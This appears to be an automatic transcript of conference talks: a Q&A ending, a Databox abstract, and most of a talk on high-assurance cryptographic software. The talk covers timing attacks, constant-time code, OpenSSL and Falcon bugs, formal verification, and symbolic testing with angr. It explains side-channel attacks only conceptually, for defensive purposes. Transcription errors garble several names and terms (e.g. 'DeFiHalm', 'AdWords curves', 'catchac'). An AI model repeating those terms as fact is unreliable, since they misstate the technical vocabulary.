arrange to meet up with friends? And a lot of those same respondents who don't use the internet use Facebook to meet up with friends. So I think it can be quite difficult from survey data sometimes to actually work out and tease apart really what is going on in terms of people's understandings and concerns about this, because some of these concepts are quite abstract. And they're also quite, I said, a lot of it is very dynamic. It's a sort of recipient design. So I can give you one answer to the question, am I concerned about privacy of my data? And if you frame the question slightly differently, I will give you a different answer, because you've triggered something else. And so I think it's quite difficult to gather really robust data that you can really be satisfied with the inferences you draw. Thank you. So there are no more questions, I think. Another round of applause, please. For more. Thank you. Thank you.
In this talk I will report on Databox, the focus of a UK-based research collaboration between the University of Cambridge, the University of Nottingham, and Imperial College, with support from industrial partners including the BBC. Databox is an open-source software platform that seeks to embody the principles of Human-Data Interaction by enabling individuals to see and exercise dynamic control over what is done with their personal data. The research project has melded computer systems design with ethnomethodological approaches to Human-Computer Interaction to explore how such a platform can make use of personal data accountable to individuals. We are all the subjects of data collection and processing systems that use data generated both about and by us to support many services. Means for others to use such data -- often referred to possessively as "your data" -- are only increasing with the long-heralded advent of the Internet of Things just the latest example. Simultaneously, many jurisdictions have regulatory and statutory instruments to govern the use of such data. Means to enable personal data management is thus increasingly recognised as a pressing societal issue. In thinking about this complex space, we formulated the notion of Human-Data Interaction (HDI) which resulted in the Databox, a platform enabling an individual data subject to manage, log and audit access to their data by others. The fundamental architectural change Databox embodies is to move from copying of personal data by others for central processing in the cloud, to distribution of data analysis to a subject-controlled edge platform for execution. After briefly introducing HDI, I will present the Databox platform design, implementation and current status.
10.5446/53137 (DOI)
Alright, now we can start for real. Please welcome Daniel and Tanya for their talk about high assurance crypto software. Thank you. So why is high assurance crypto software a thing? Why do we worry about the correctness of software or the quality of software? So just some recent news results about, well, crypto getting broken so badly that the private keys leak, these are just reports from October and November and this one nicely adds a pattern saying timing is everything. So these were some timing attacks which completely broke elliptic curve based cryptography so badly that the private keys came out. Timing attacks are not a new thing. So back in the days when you're logging into a server and that is looking at your password, it might be doing a character by character check. So for instance you start by, well, let's find out what the first character is so you're sending AAA, BBB, CCC. Now of course none of them will actually work. This will be very surprising if this was the right password. But you do observe the time it takes to say this password is wrong. And then you notice that CCC takes a little bit longer to fail. Yay CCC. Then you're trying CAA, CBB and so on and so on still fails and they all take about the same time to fail until you're getting to COO. And then you're trying again for the third character and so on and so on and so on. So eventually you get the password and this was actually a thing. This was 1974 the Tendix system so it was an operating system where you, well back in 1974 before most of us were born here, you could log in and it would be just doing this character by character checking. So timing attacks to break cryptography or break security have been known for a long time but of course things are getting more subtle when you go into cryptography rather than just character by character comparisons. So for instance if you're implementing your favorite cryptosystem be it DeFiHalm and Final Field or be it RSA then each time you have to compute an exponentiation. And then you go back to your Crypto 101 lectures and don't compute C times, C times, C times, D times but you remember that there was a square and multiplier algorithm which tells you okay you look in at the bits of the exponent so here I'm going for the representation of D in bits. I'm looking at the length in bits and then I start by initializing so you can run this just sage code. Initializing you're finally going to be the message in RSA and then for each step you're doing a squaring and if the bit is set you're doing a multiplication. And this runs from well the first bit we've dealt with already so the second highest bit till all the way to 2 to the 0 which in sage this is well like in Python so this is the range is not included and then you output the ciphertext at the plaintext. Now there's some problems with this so if you're an attacker and you know that your user is using this to compute an RSA decryption then you observe that this loop length gives you some information on D namely the length of D in bits. This L was defined as well how many bits does D have and then some Ds well this D looks rather short. This D is much shorter than N it's much shorter than fire of N so this would be an unusual D and so it would leak that it's a little bit shorter. Also here we have a branch I go if this bit is 1 and not then well I'll just continue so depending on the level of fine grained access somebody could even see whether I'm going for a multiplication or just moving on to the next squaring. In the worst case somebody could read out the pattern of 0s and 1s by just knowing whether I entered this branch here or not. Now if you're a remote attacker you only see the overall time now I have a picture from something similar it's not an expensation for RSA it's a loop to curve scalar multiplication this is from a recent paper from TPM fail and they observe how long it takes to compute well the equivalent of elliptic curves is scalar multiplication so you do double and add instead of square and multiply and you can nicely see that the bulk of the computation well for most exponents slash scalars it takes this long and if you have some leading 0 bits it's much faster to still somewhat faster. Now there is some variability and it could be faster because your D is very sparse it could be just one and a whole bunch of 0s and then another one that would also be as fast as something which is a few bits shorter but then more dense so that you don't know exactly whether it was short and therefore fast or whether it was sparse so few multiplications and therefore fast but if it's a lot faster it's probably both. The top bits are missing and therefore you don't have multiplications there so if you're very fast you have a good guess that this thing was actually short and so there's a strong dependency on the length there is also a dependency on the density. Now typically your implementation will actually not be doing it I was surprised that this paper included actually found an example where you're really going bit by bit because of most of the time our time is very precious and so we want to speed up things so if you're taking your favorite number like 1419 also known as 36C3 and you write this in binary and then you want to do your multiplication well your scalar multiplication starting from the top bit all the way down similar to the RSA loop but you want to save on the number of multiplications slash squareings then you would be grabbing two bits at once you pre-comput a few values you can pre-comput your C, C square and C cubed and then to compute this exponentiation you kind of doing two squareings at once so you're doing two of these positions at once the first one you can skip because it's both zeros the next one the one one gives you a cube so we're starting with C cubed which we nice enough have pre-computed. Now we're moving on by two bits so instead of square one we square twice so that's why the fourth come in here next position is one next position is two so we see a multiplication by C computing to fourth power by C squared so and everything is like in the previous loop except for we doing two bits at a time and so instead of saying oh if the next bit is set we do a multiplication we look at the value of the next bit and then select from C C squared C cubed or no multiplication and this definitely reduces the number of multiplications this would have normally taken seven multiplications and this way we only take four it doesn't change the number of squareings. Now this will smoothen out the effects of having a sparse integer because well as long as there's a single one in the window we call this thing a window here then it will cost the multiplication whereas normally would be one multiplication and no multiplication here so when you look at the traces from this then you get much more accentuated boxes whether something is zero at the beginning or not because most of the other steps in particular for larger windows this seems to be taking four bits at once so for the larger windows most of the time I mean if you have four bits then there are 15 cases out of 16 where you have to do multiplication and only one out of those 16 where you don't need a multiplication so it accentuates the length issue and kind of you have no idea whether the bits were set or not I mean how many bits were set. Now how much does these few bits do? Of course you don't want to leak your secret RSA exponent you don't want to leak your Divi Halman but it's not too bad there it's really you would need a lot of knowledge you need to have either extremely short or extremely sparse to actually break something with us. It's kind of worse if you're having RSA with Chinese remainder theorem decryption because then you can do some combination tricks so there's something we gave a few years ago how you can combine information if you know a few bits of D of D model P and of D model Q and then you combine these so then you learn more. When it really goes bad is if you're doing signatures, DSA signatures or easy DSA signatures so these are systems which are extremely fragile and it's a strange thing that by just looking at the scalar multiplication for a number which you will use only one single time so your signature generation starts with you pick a random number you do an exponentiation or scalar multiplication and then you do something else with this number. These one time numbers these one time exponents if they are somewhat biased for instance if you know that the top four bits or top eight bits are always zero you're getting the secret key so it is very very strange system that this is possible and this was exploited in the two papers from which I showed you the news coverage so there was a TPM fail this November by Daniel Moghimi, Bergzuna, Thomas Eisenbad, Nadja Henninger who showed that doing this to typical TPM implementations of TPM cryptography so you have your TPM in your computer in charge of doing the signatures say for VPN connection then they could get the keys out of the TPM remotely. There was another paper called Minerva Tech I haven't seen the paper yet but they have a very nice and informative web page Jan Ganker, Peter Svendor and Vladimir Steadlach where they are doing the same for smart cards which were actually certified so this is really bad attack and it is something where all these implementations both the TPM and the smart cards for the signatures should have been tested for this before but apparently people didn't test or didn't realize that the small bias has such a youth effect. There are more attacks so this is just the basic you see the overall timing but this already broke lots of libraries, smart cards and TPMs. If you are getting more detailed information if you are on the same process like you are running a hyperthreading attack or cache timing attack then you might even be able to figure out when you are doing the lookup for the pre-computed values where this lookup went so you are kind of booby trapping the table where you are going to look up something and then depending whether the processor fetches this entry which is in cache or that entry which is not in cache you are learning something about the exponent and you can even recover the exponent from these things. Now this should be a constructive talk. We said this is 80% constructive so let's jump in how would you fix this? So one thing is for all our crypto implementations we actually know kind of an upper bound. This is not an arbitrary expo it is an RSA decryption. We know that our RSA keys, well, we know a bound on the end. People pick 2048 or 4096 bit keys so we have a good upper bound on how long this D will be. So why don't we just use that? So we are making this loop length independent of what D actually is but just saying we will take the number of bits in N rather than D. So the problem is before we started initialize the message with the ciphertext and then we kept squaring and multiplying. But there is an easy way out. We just initialize at one and well if you square one it stays one until you have reached the bits that are actually occupied by D. So when we expand our D we are padding to the full length and initializing at one so we have a fixed length loop and this one takes care of not modifying our values. And then we do the normal thing. We square and we conditionally multiply. Except for we don't want to have this if else. I mentioned cash timing attacks and in general well you might be leaking well you are definitely leaking how many bits there are and you might be leaking more depending on how different your multiplication looks from the squaring. And so what we typically then do is we give up on a bit of performance, we do a multiplication for every bit not just if the bit is zero and then we conditionally select which of the two to take. The one which we just computed, the H here that is with multiplication or the one without multiplication. And we don't want an if and else there because an attacker could observe the branch, could see whether we are going or we are not going. And so we do this whole thing by arithmetic. Well okay let's briefly run through this. If the bit is zero then I have one minus zero times m so I'm getting m, great. And then if this bit is zero I'm taking zero times h. So for the zero bit I'm computing m which is what I wanted. And now for the one bit I should be grabbing h and yeah of course if I have one minus one this is zero times m plus one times h. So this modification to the code comes at a bit of a cost so it's as slow as the worst case both in the length so our loop has gotten longer, we're doing more squareings and we're doing a square and a multiplication for each bit which otherwise would have just been the worst case. Now I've been saying elliptic curves and I've been saying if you're doing the same thing you can initialize at one and then multiply by e-generator so that's cool. Now if you're doing the same thing with elliptic curves then things get a little bit more iffy. If you were here, by now it's five years ago at 31 C3 then I would be giving a talk about elliptic curves and we've been ranting a little bit about Weierstrass curves and one of the things that makes Weierstrass curves nasty to implement is that you always have to talk about this extra point so you have a nice curve and then there's an extra point called the point of infinity. And this point of infinity messes up most of our arithmetic so we don't have nice formulas where you just say hey, well this is our neutral element and so we start at this and then we keep on doubling this. Most of the formulas have this exact point as an exception so we can't initialize it there, there are ways around it but the default is not as easy. There's some nicer curves, we've been advertising AdWords curves and Montgomery curves so on AdWords curves the neutral element is nice, it's the starfish shape and you have this ponded 12 o'clock and you can just do it so for AdWords curves everything is nice and I should also do a shout out to Montgomery curves for instance the famous curve to 519 which you might have in your browser or in a cell phone that is using formulas due to Peter Montgomery which are very happy about this data flow and you even get a discount. So you're doing basically one doubling and one addition for each bit, same as the squaring modification just called addition here so it's like okay, then we'll comment that probably this is just to make sure that the mathematicians keep lifetime employment because nobody could possibly understand it otherwise. So it's all the same, it's called addition, doubling, sorry for that, not my fault came before me but you're getting this combo of addition and the doubling for less than it would take otherwise so it's not as bad as it looks like for RSA of Adiffier-Harmann. In fact the reason that 2519 gets used with these Montgomery formulas is that for that bit size it's the fastest way you can implement scalar multiplication so it has a nice feature of being constant time and is cheaper. If you needed some more motivation for wanting constant time there is an additional benefit of constant time namely you have figured out how long something should take and so certain things should not happen so if you know that your arithmetic does finish in time x you will not enter an infinite loop as the Microsoft cryptography library did recently for Windows 10. Oops, constructive talk you said so now we've had bug, bug, bug and a little bit of fixing and maybe you believe that yeah okay these timing attacks are a problem and sometimes people do believe like open SSL they've got a few subroutines which are labeled claimed to be constant time and there's some other crypto libraries which say we've got some constant time code it's not pervasive by any means but some people say they're trying to do things in constant time and avoid these attacks and then well is that true? I mean people make claims about crypto all the time like RC4 which was used until pretty recently sorry. That's bad crypto. It is bad crypto but it was introduced with a claim that it's great crypto. RC4 is the crypto you want to use and somebody gives you RC4 software well originally it was proprietary but eventually it was leaked and then everybody had RC4 software and this software yeah it's a strong cipher and it's constant time and well how do we check these things? Well the strength of the cipher that's outside the scope of this talk it's not a good cipher yet don't use RC4 but how about the constant time property of RC4 or something else? Well this example actually uses RC4. This code is maybe a little bit weird so let me first look at what this code does and then say what Valgrind is doing with it. This code is sort of the start of code to encrypt using RC4 and what it does you see there's some key running around there's some space allocated for the key 32 bytes maybe you want to use a different length you can try this for different lengths of key but 32 is a reasonable length of keys and then okay the key is allocated the program will abort if the malloc failed and then at the end it frees up the key properly it doesn't ever initialize the key. So this is maybe a work in progress program but okay there's some space for a key and then it expands the key. RC4 there's a key expansion process into what OpenSSL calls this RC4 key structure and then oh there's supposed to be some encryption after this. Well that didn't quite happen yet either but this program is still something you can compile and the compiler with normal optimization options and without link tom optimization and so on it won't realize that this program is doing nothing I mean maybe the RC4 set key is I don't know crashing your system or producing some output or something so the compiler will call malloc and RC4 set key and then you can try running this program under Valgrind. Now I'm sure lots of people here have used Valgrind or address sanitizer for checking for memory problems. Valgrind has the advantage that it works on binaries and maybe some people were in room C for the previous talk about fuzzing and it's really helpful to have tools that work on binaries so you don't have to worry about getting into the whole software engineering process compilation process you just take the code that you're going to run like the RC4 set key from OpenSSL you don't have to recompile or redo anything with OpenSSL you can just run Valgrind on your compiled code and it will run this program and allocate space for a key and then it will call the RC4 set key and run through Valgrind interprets every machine instruction and while it's doing that it keeps track of all right which memory is actually memory that's you know you're allowed to talk to you for instance the malloc is setting aside this amount of space on the heap and then well you're not supposed to be going before or after that and Valgrind is trying to keep track of what your pointers are pointing to and then when you read and write data then it's going to say oh you're not allowed to do that and one of the things that it checks is suppose that you have some uninitialized data and you use that as a pointer or you use that as a branch condition and you try to do an if or an X bracket I where I is not initialized then Valgrind will give you an error and that actually happens in this code the malloc array well that's uninitialized and then Valgrind will track all of the uninitialized data like taint tracking it'll figure out all of the other computations on uninitialized data inside RC for set key and then it will complain so you get an error message looks like this usual kind of Valgrind error for the people who've used this tool and then it'll say there's some use of uninitialized value which is not just any use this means that you've been doing some array access X bracket I where I is uninitialized and that's where Valgrind I mean what would it mean it makes sense that Valgrind would say oh I don't want to continue past that X bracket I and and just guess I mean it's trying to figure out if you're accessing some wrong spot in memory and if I is uninitialized it just says that's an error you're not supposed to be doing that and similarly if you do an if based on if I where I is uninitialized then Valgrind will say no you're not allowed to do that and it'll produce one not exactly the same error but something else another complaint about a branch based on uninitialized data and hey that's exactly what we want to do to check whether this RC4 set key is constant time code this is checking is any of the key information is that being used for a branch anything derived from the key is that being used for a branch or is it being used for X bracket I which could be getting into one of those cache timing attacks and so if Valgrind says there's a problem then you investigate and you fix it by throwing way RC4 or whatever you have to do to fix your software and if Valgrind says there's no problem then hey cool all done. All right so it is a happy talk after all so we're in a situation that we have constant time expensational scalar multiplication we have constant time RC4 under a few of the conditions so one of the things is that you're arithmetic I mean in the end you have to implement your computations on the elliptic curve or you have to implement your arithmetic module to RSA modulus and you have to do this long integer arithmetic in constant time but you can again check this as well. Valgrind with every single machine instruction it's going to follow through so Valgrind awesome tool. Well there's another condition that the processor doesn't screw you over the processor tells you well okay I'm going to do a multiplication I'm going to do division I'm going to do an addition now if you have something where the processor is going to say I do this in one single clock cycle then that's probably okay so you check the manual check the reference code and sorry the reference manual and you look at how long it takes for one application for one addition you look at like when you have access to it and so on so that's fine but how about other processes so I had a poor student look at the Cortex M3 so that's a low-end ARM processor and we asked them to do some nice implementation of elliptic curve cryptography and if you're having a multiplication which is taking two 32 bits words and producing a 64 bit output so twice as long as multiplication should be doing and then you look at these cycles count then you're seeing three to seven cycles footnote C. Footnote C tells you that this might be aborting or terminating early depending on the size of the source value there's a worst case latency of one cycle something more and up to seven cycles so alright so student with lots of time it's only two times 32 bits inputs right you can just know you can't test all of them but you can have a student test a whole bunch and so he came up with this flow chart so this Cortex M3 gives you values between three and seven cycles it gives you actually every number between three and seven cycles except for four depending on which of those branches you are taking whether something is a special operand yes or no and whether both are special and one is zero in that situation Valgrind won't help you and that situation is basically by different processor. Yeah this is what happens when we decide to do a constructive talk 80% positive this is going to be defense yeah and then we talk about it and realize yeah it's all broken it's kind of sad it's actually even worse I mean it's not just that the tools don't do what we want them to do for checking for things being constant time but they also don't check that the code is correct I mean we spent half the talk now talking about timing attacks and there's all these vulnerabilities to timing attacks appearing in the news and lots more that don't appear in the news and then suddenly there's more CVEs which are not just timing is going wrong this is like okay let me explain this first of all crypto memcump this is a function inside open SSL which says it would be really embarrassing if open SSL had that one byte at a time password checking or authenticator checking inside the code so crypto memcump has been there forever in open SSL and that is doing supposedly constant time comparison of two byte strings now it's not that open SSL does everything in constant time but it does this in constant time and the PA risk implementation because of an implementation bug the PA risk crypto memcump function only compares the least significant bit of each byte now this is from May 2016 somebody thought that they knew what PA risk processors are and it's a good idea for open SSL to have assembly code for comparison of two byte arrays on the PA risk I don't know how many people actually have ever used a PA risk processor can I see okay I see at least 10 hands being grazed I'm impressed this is not the world's most popular processor but it exists and you can write assembly code for it and maybe you can even find some machines where you can run this code and actually it's not crazy that open SSL is doing assembly code for things because compilers screw things up pretty frequently on the other hand as this particular implementation illustrates humans also screw things up pretty frequently so what does this bug do what is the impact well let's look at the advisory it says this allows an attacker to forge messages that would be considered as authenticated in an amount of tries lower than guaranteed by the security claims of the scheme okay let's figure out what this means so you've got a message and it's got typically a 16 byte 128 bit authenticator at the end of the message and then this crypto memcump is being used to check it recomputes the authenticator with whatever mathematical function and then checks is the result equal with crypto memcump to you know what's coming in from the network and if somebody's modified the message then hopefully they can't compute that same 128 bit result and now we try with this p a risk crypto memcump on your p a risk server we try comparing the authenticator that's computed 128 bits to the 128 bit correct authenticator and it's only comparing the bottom bit of each of the 16 bytes so it compares 16 bits which means that instead of a 2 to the minus 128 chance of forgery it's a 2 to the minus 16 chance of forgery so the attacker just tries 2 to the 16 messages and one of the forgeries is going to work it's lower sorry it's lower it is lower yes 2 to the 16 is a lower security level than 2 to the 128 this is like classic British understatement of your security level is perhaps not quite what you want okay p a risk let's forget about p a risk just like the whole computer industry has and focus on Intel now okay I mean p a risk it was a nice idea at the time you know son used to have these spark processors now Fujitsu still makes spark processors I don't think anybody's trying to preserve p a risk but people have these ideas of making new instruction sets and you know at some point Intel made a new instruction set and it got really popular and they kept extending it and kept selling nice fast processors so here's using AVX to there's some that's this 256 bit vector instruction set on current Intel and AMD processors there's an implementation of 1024 bit modular exponentiation in open SSL and the code from July 2013 was discovered in 2017 or announced in CV 2017 3738 to have an overflow bug now what's the consequences of this bug let me guess it's a lower security level well they say attacks against DH 1024 are considered just feasible now yeah you shouldn't be using DH 1024 in the first place but if you are then if the attacks are getting just feasible does that mean 2 to the 16 computations does it mean a day on your laptop does it mean a year on a cluster I want to know how hard the attack is and well this isn't really answered and there's more that's not really answered in the advisory because they say well you're probably not using DH 1024 but maybe back when this was announced you were still using RSA 1024 or maybe the essay 1024 and those would also use the same sub routine and then the advisory said that the attacks against RSA 1024 as a result of this bug would be very difficult to perform and are not believed likely now what's happened here there's the original crypto system and then there's a bug which basically makes a new crypto system doing a wrong computation and I mean this notion of wrong as well it's a different crypto system and then is that new crypto system this slightly different RSA 1024 it shouldn't criticize it it's just you know differently abled RSA 1024 and that's it's you know maybe it's secure and they say it's going to be fine and well has anybody really looked at this normally if we have a new crypto system then we wanted to go through a whole lot of review because it's lots of things you can do wrong and it's really important to get these things right lots of people were using RSA 1024 you shouldn't of course you should use something much bigger or switch over to elliptic curves but if people were using RSA 1024 and they had these wrong computations happening what are the consequences where's the papers analyzing this widely deployed crypto system it's like saying yeah we've deployed this crypto system and we've looked at it ourselves and we've decided attacks aren't likely and just believe us well people say this sort of thing if you can't break it's going to be fine yeah okay yeah you're right you're right everything's fine and similarly a few weeks ago when open SSL put out another advisory for another bug like this cv 2019 1551 not I mean it's not that we knew this was coming and we figured we would have a talk about bugs in crypto software just to make fun of this I mean this is these things happen so often there's so many of these bugs and we don't know what the consequences of all these bugs are they just keep happening here's an example of just one piece of the patch for the 2017 bug yeah the code before already has correct it oh you're right the patch adds some lines saying correct oh well okay that's clear enough next slide how about post quantum crypto you know you got these top hundreds of cryptographers around the world fighting against the threat of quantum computers and putting together the next generation of cryptographic software protected against quantum threats that's going to be carefully evaluated right everything's going to be just fine well no Falcon for example this is one of the round two signature competitors in the NIST post quantum cryptography competition well post quantum cryptography standardization project and this one there was an announcement in September 2019 which said here's quote from the author of the software saying well there's some bugs and the consequences are the signatures leak information on the private key and they also make the software sound faster than correct software would have been and interestingly all of the implementations all of the latest Falcon round two implementations that were released had the same bug they all had the same test vectors they all were you could cross check them and they were doing the same leaking wrong oops sorry different cryptographic computation which presumably has lower security and then are we going to spend a lot of time figuring out how low the security level is the author also commented the fact that these bugs existed shows that the traditional development methodology being super careful has failed all right so what can we take from here so mathematical complications and cryptography is thinking of like elliptic curse what I mentioned if you have these special points that need extra treatments you have to watch out are you even allowed to add those can you even represent this in your in your software those do make your software more complex something that we saw in the Falcon implementation it was a new system and it hasn't been studied for long so something which has been studied for a long time like rsa and ecc we still see issues with it things get worse if you have such long counter measures so as one example you saw how I was trying to avoid the leaking whether the bit is one or zero by introducing arithmetic now if you have to review that code before we just says if the bit is one do this if the bit is zero don't do anything versus the code which has the arithmetic instruction it's more complicated so such one counter measures also add more complexity or then was mentioning this comparison bug in the api with this was also because people were trying to make the comparison not leak information through timing so they made a new implementation and introduced new bugs and then of course with post-quantum cryptography we're getting a whole bunch of systems like falcon which have been less studied where we have less experience and how to implement it secure we don't even know all the pit falls that add to the complexity where we have to watch out so it is a problem to review cryptography another problem with crypto is that we have this driver speed crypto runs through large volumes of data so we have to be really careful we have very small code we have to run it many many many times and we will optimize the hell out of this doing like one squaring for each step and one modification for each step really is annoying so we're trying to squeeze it here we squeeze it there so that makes it more error prone as well and also you're getting a huge amplification of implementations you will have implementation for your x86 architecture you're going to see some with avx2 instructions some without avx2 instructions well you might go all the way down to pavisk special instructions so there is for each cpu there is a dedicated implementation not just the reference code and then if you look at for instance catchac which was the winner of the shard 3 competition so it's a relatively new hash function which only exists for like new platforms but still they're having more than 20 implementations for different platforms in their library or google in order to get speed for um hard disk encryption on some lower end smartphone so if you have a cheap smartphone you might have just in codex a7 rather than the the new architectures which have as support and so they were like okay well maybe we should add full disk encryption but what we have sitting around is just too slow doing as without the hardware support would drain too much battery and so they went even down the road of of uh taking a cypher specified by the nsa the spec cypher and they put it on there because it seemed to be the only thing that was satisfying the speed requirements now they did switch after some public outcry and in particular jason donfeld did a lot of work there to make them switch to something better and they then did another implementation so yet another code base to having a recently designed combination which they call adiantum with xchacha so there is a lot of code to review and a lot of places to get errors so how do we deal with this well maybe if the problem is all these complicated implementations of all this complicated math maybe math is the solution so here's the help sorry that seems to help yeah yeah more one plus one this two so that's a comment from the bottom here from this book from 1910 from this proposition which is proven in very comprehensible language here it will follow after we've defined addition that one plus one equals two and this is on page 379 of this book called principia matematica principles of mathematics by white I don't know if they do one plus two equals three that sounds more complicated but somehow they find it important to prove something and like in all this incredible detail some sort of like machine language for for proofs and then people complain that their machine language has bugs and well people have worked on this over the last more than 100 years and they would actually recommend there's fans of this who say that yeah you should be going through this kind of pain you should spend 379 pages proving that your code works so you should take your software and you should write down a formal proof in incredible detail not just to convince yourself and some friends but you should convince a computer that's doing automated checking of your proofs and that computer program says yes you have a correct proof that your software is computing the right thing and what is the right thing well you have to carefully define that specify your language for your software specify what the input output relationship is supposed to be and then prove that you have that input output relationship for that software assuming of course that you've gotten all that right then your proof if it's checked then yeah everything should be fine these tools they work but there's something just to give some context there's something that mathematicians who do proofs all the time don't like these tools occasionally they'll use them but it's really not a popular set of tools because there's such a pain to use nevertheless they have enough fans that some amazing results have happened so evercrypt this is something there's like 15 authors on the paper and they have a crypto library which has implementations of all the crypto you need as long as you don't care about any of those NIST curves or post quantum crypto or well here's the list of what they do support it's got some public key stuff and some signatures some symmetric functions it's got arguably enough to do you know like HTTPS you can do with these primitives and that's what evercrypt supports in the case of AES you need your CPU to have AES instructions so maybe that's not so portable but okay it does support some other ciphers on on any platforms and you can use this and there's proofs people have actually done the evercrypt papers reporting how they took some standard proof tools and actually formally went through this software does exactly the right calculation which is like okay that that's some serious guarantee the good thing about this is that the code really has the maximum assurance of any code that we've seen for cryptography that it's it's really saying yes this code is computing the right thing if you use evercrypt then it will compute the right output for every input exactly what is specified assuming the specifications correct assuming the processor is correct assuming the compiler is correct because a lot of it's written in C you need your C compiler to be correct but well okay you can deal with those problems separately how do you verify CPUs how do you verify compilers etc and have people review the cryptographic specifications so it actually it's feeling like something serious is being accomplished here the only problem is that it's such a pain to do for every implementation you have to do quite a bit more work and people are getting lots of practice building better tools but it's still a ton of work to do these formally verify pieces of cryptographic software an example of how hard it is is just illustrated by that list of whatever crypt supports they've got some implementations of these functions they even have for intel chips some fast implementations of some of the functions but if you want something that's fast on your smart phone or smart watch where maybe performance is more of an issue than on your say big laptop then no evercrypt doesn't give you fast implementations it does have something that works but it's going to be several times slower and nowhere near what tanya was mentioning about trying to squeeze out all the last speed it's really far behind the state of the art in speed because it takes a lot of human time to take a new implementation and prove something about it so what do you do when you don't have proofs well of course you test stuff now we could spend the whole hour about like how cool testing is and just I mean let me actually see a show of hands here how many people here have ever had this feeling of I wish I had done some more tests of this code like you know this bug that I had let me see a show of hands I see pretty much everybody in the audience raising their hands okay now how many people have ever had this feeling of oh I did too many tests I see okay maybe you know maybe about 20 people out there have this feeling out of about I don't know thousand something applications sorry who's in both camps people who thought they tested too much and too little yeah yeah yeah of course testing is fantastic you should test everything and if you find that testing is something hard to do then it's probably because you screwed up in your factoring of the software that you're trying to test you have too much cohesion you should be modularizing it more and have a piece that you can test if you do test driven development then you will basically have working code all the time and that's a really nice feeling except well there's a little problem which I'll get to but something like the crypto memcump bug for example in open ssl for pa risk where it was only testing like the bottom bit and seeing what do the bottom bits match that's something which gives the wrong results for one out of two to the 16 inputs just random inputs will will give the wrong results so if they try two to the 16 or tried millions billions of tests doesn't take that long and then it's going to catch that or instead of trying just totally random tests the whole fuzzing philosophy says let's try to smartly choose what you're going to test and you try for instance you try a string and then try flipping a few bits here and there does it give the right result of a comparison and that very quickly finds that the crypto memcump doesn't work and these are not just things that you you could think of doing retroactively this was actually implemented in the supercop crypto test framework before the bug was introduced in open ssl and it's just well though the crypto code wasn't plugged into that framework so well we didn't catch the the bug but it's it's like we almost could have if there'd been a bit better organization of the testing effort in general if you see a bug then at least retroactively you should find yourself thinking all right how can I make tests that will catch that bug and usually there's a pretty easy answer to that and then you add that to your regression test suite and make sure it never happens again and then if these regression test suites are shared enough then it never happens to anybody again and that's really effective except well the main thing that goes wrong with testing is that you're not testing all of the possible inputs and so we've seen time and time again millions of security holes which are the attacker is finding some input which nobody thought of testing for it wasn't party or random testing it wasn't even caught by fuzzing it's just some obscure kind of input where the attacker says ha ha if I try an input of exactly that length after setting up the following condition then the following weird thing is going to happen and then I can take advantage of it like this there's some input that behaves in the wrong way which you're never going to find through testing or even with the most advanced fuzzing that we have so how do you deal with this well it's not so easy and it's something which definitely affects crypto for instance November 2019 nath and sarkar said the fastest code for one of the standard elliptic curves out there curve 448 high security modern elliptic curve crypto this is bigger than 25519 if you want something at a higher security level there's a bug that randomly happens with probability one in two to the 64 well that's a lot of tests that's yeah i'm not going to do two to the 64 tests I mean we've done some computations at that scale but it takes a lot of effort to set that up and it's not something you do with lots of different pieces of software again and again could an attacker find those inputs well it's clear in the paper announcing this nath and sarkar say all right here's some inputs which make this operation fail inside like a subroutine doesn't mean the attacker can find inputs to the whole crypto operation that make it fail should there be more analysis of like how devastating this bug is or should we just get rid of the bug in the first place they say all right certain kinds of inputs the code gives wrong results but it's very low probability so no enhancer tests are not going to give not going to find this and so they say you have to prove correctness and this is the dichotomy that people often say you have to either well do some tests that'll find the the common bugs or do proofs that's a lot more work really painful but that'll find all of the the bugs there's another approach which is symbolic testing and this is something where i'll take memory comparison example not for pa risk but on the left side here let's not think about this as testing but code auditing on the left side here is crypto memcum for normal intel chips x86 64 inside open ssl and you can read through that well maybe you can't because the font size is too small but you read through or maybe you're not fluent in assembly but you read through and eventually you say here is the computation that it's doing for some particular size of input let's take for example three byte inputs of course you have to try every length that you care about like 16 bytes is very common so for each length you figure out what does this code do and for instance for three byte inputs it's taking x0 x1 x2 comparing to y0 y1 y2 and then well how is it doing that comparison in constant time well it's exclusive oring x0 and y0 together exclusive oring x1 and y1 together exclusive oring x2 and y2 together so now it has three byte xors it oars them together bitwise so that's the number between 0 and 255 where if the array is matched you would get 000 and then everything else is going to be 0 if there's any difference then the xors will be between 1 and 255 and the or the bitwise or will also be between 1 and 255 and then you convert that to a 64 bit integer put 56 x0 zeros on it negate that integer shift right and if you think about this for a moment you see that you always get 1 if there's any differences in the inputs and that's a logic you can go through as a code reviewer to say yes this does work correctly you start from the assembly you figure out what it means for each size that you care about that's this graph this computation graph showing the arithmetic from these inputs to DAG a directed acyclic graph that shows how the inputs give you some output through a series of computations and then well you analyze this graph and say yes this works correctly and do it again for each length all right there's tools which make this really really easy to do let me highlight anger it's not the only tool out there but it has the big advantage of working on binaries it starts from valgrin from libvex inside valgrin and then builds a lot of extra cool stuff on top of that what anger does is that whole red arrow inside the previous slide it does that for you automatically it will take your binary and it will run through the instructions and tell you all right here's what that did for your input arrays x and y and here's how the output is a graph from those inputs now this makes your code review easy because you don't have to think about memory access pointers you you don't have to deal with the complications of the assembly instruction set the the output of anger is a much simpler instruction set there's no jumps it's just completely unrolled this DAG that you get as output there is a constraint which is that anger if it reaches a branch based on one of the inputs x and y then it's going to say oh there's there's two possibilities maybe you take the branch or maybe you don't and if you do an array access based on any of those variable inputs it'll similarly split that and say well there's all these possibilities for which array uh index you're you're accessing but hey we were getting rid of that that was the the first part of the talk is we don't want to be doing these variable time instructions we're just going to have straight line computations maybe you have some some loops but it's based on public data not based on the the secrets that you're trying to work with so we get rid of this blow up in crypto code anyway we want to do that to protect against timing attacks and then that means that anger runs really fast and it gives you the unrolled code and then it can even sometimes check the correctness of that code for you so for instance this crypto memcump for three byte inputs it will tell you yes this works now we have only uh nine minutes left so maybe i'll just very very quickly show you what some code looks like but i'll skip a bunch of details this is a simple call to crypto memcump on some arrays of size n you define n to be three or sixteen or whichever length you care about do this again and again and this takes uh x and y those arrays compares them puts the result into z the compiler won't get rid of this code with normal optimizations because who knows what happens after main maybe the exit is going to look at the z value because it's a global variable and uh maybe it's going to do something with it so this crypto memcump will be called and then anger well okay there's some setup of grabbing the binary telling anger that the memory is all filled with zeros to begin with you tell anger all right you're going to run the code in anger but instead of having zeros coming in for the x and y let's replace those spots in memory with some variables let's say that the x bracket zero in memory that's going to be the x zero variable where we don't know what that is it could be anything zero through 255 and same for x1 x2 and y zero and so on and then you run the program and you extract some z's out of all the possible universes you get at the end and for each one that all the magic is happening in the last lines here 